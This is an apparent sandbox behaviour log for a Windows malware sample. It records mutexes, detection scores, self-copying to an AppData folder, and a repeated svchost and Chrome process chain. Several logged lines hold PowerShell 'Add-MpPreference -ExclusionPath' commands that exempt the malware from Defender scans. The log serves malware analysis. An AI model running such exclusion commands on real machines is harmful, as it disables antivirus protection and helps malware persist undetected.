                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-O844B9
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1208:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6976
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0f4gafwu.vs5.ps1
                Source: 4XYAW8PbZH.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 4XYAW8PbZH.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Windows\SysWOW64\svchost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: 4XYAW8PbZH.exe | Virustotal: Detection: 59%
                Source: 4XYAW8PbZH.exe | ReversingLabs: Detection: 68%
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | File read: C:\Users\user\Desktop\4XYAW8PbZH.exe
                Source: unknown | Process created: C:\Users\user\Desktop\4XYAW8PbZH.exe "C:\Users\user\Desktop\4XYAW8PbZH.exe"
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe"
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Process created: C:\Users\user\Desktop\4XYAW8PbZH.exe "C:\Users\user\Desktop\4XYAW8PbZH.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1372
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7188 -s 1276
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2300,i,10737837625504977776,1997224637472770813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2012,i,4138460331120134385,5683384739135737573,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1976,i,2517950207159565068,10782540892853908230,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1980,i,683593662308323729,9862283109921041436,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=828 --field-trial-handle=1136,i,5921432477754910368,13753575883471156045,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,17133631053466548675,5917926669792758127,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,5631293592904426678,1728656617054090218,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1152,i,8013400789958701554,8044825980928044458,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1976,i,9020892517801786784,10645353824597710220,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1972,i,9724548607629697657,13638253049410839489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1964,i,11798321828357005052,16972695017880113129,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1944,i,4936340759003262573,15814975481951039996,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1984,i,3689067430776497247,15300495909368681371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1972,i,8812933395650124059,17698073702536386733,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1936,i,2605296248091638972,4924302696092150325,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1472 --field-trial-handle=1980,i,15377228353991002800,792711668187999877,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1996,i,306334268389520684,17870841813551360438,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1992,i,3378677205698214136,1924167881851413353,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=868 --field-trial-handle=2020,i,696290173973552029,16877605372930337061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1956,i,12129368793975855261,4084447202771776108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1976,i,5375429189451205296,3038177405675182667,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1980,i,8051270230576347227,15887782478097552568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,5804494753339918936,5217131698543492645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1136,i,1930181798274664567,3542273984303113262,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1668,i,10836949039064754798,10619019416050471488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1972,i,17733880235770984801,5447189613793920795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
